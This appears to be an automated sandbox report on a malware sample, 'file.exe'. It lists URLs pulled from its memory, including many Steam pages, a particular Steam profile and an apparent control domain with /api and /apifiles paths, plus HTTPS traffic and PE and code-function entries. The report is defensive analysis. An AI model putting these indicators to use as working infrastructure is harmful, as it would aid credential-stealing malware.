    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api3
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apifiles/76561199724331900
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900qt
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2237080078.000000000133C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237029874.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
    Source: file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49718 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B102280_2_00B10228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4A0D00_2_00B4A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B120300_2_00B12030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC40450_2_00CC4045
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B010000_2_00B01000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B440400_2_00B44040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C370350_2_00C37035
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0E1A00_2_00B0E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B071F00_2_00B071F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2B19A0_2_00C2B19A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B051600_2_00B05160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B012F70_2_00B012F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B382D00_2_00B382D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B312D00_2_00B312D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0B3A00_2_00B0B3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B013A30_2_00B013A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B323E00_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0A3000_2_00B0A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7230C0_2_00B7230C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC84CB0_2_00CC84CB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1049B0_2_00B1049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B144870_2_00B14487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B364F00_2_00B364F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2C4700_2_00B2C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B035B00_2_00B035B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B085900_2_00B08590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C5F00_2_00B1C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B486F00_2_00B486F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3F6200_2_00B3F620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B486520_2_00B48652
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0164F0_2_00B0164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3E8A00_2_00B3E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCF8D60_2_00CCF8D6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C088EA0_2_00C088EA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3B8C00_2_00B3B8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C678480_2_00C67848
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B318600_2_00B31860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0A8500_2_00B0A850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B489A00_2_00B489A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2098B0_2_00B2098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCA9820_2_00CCA982
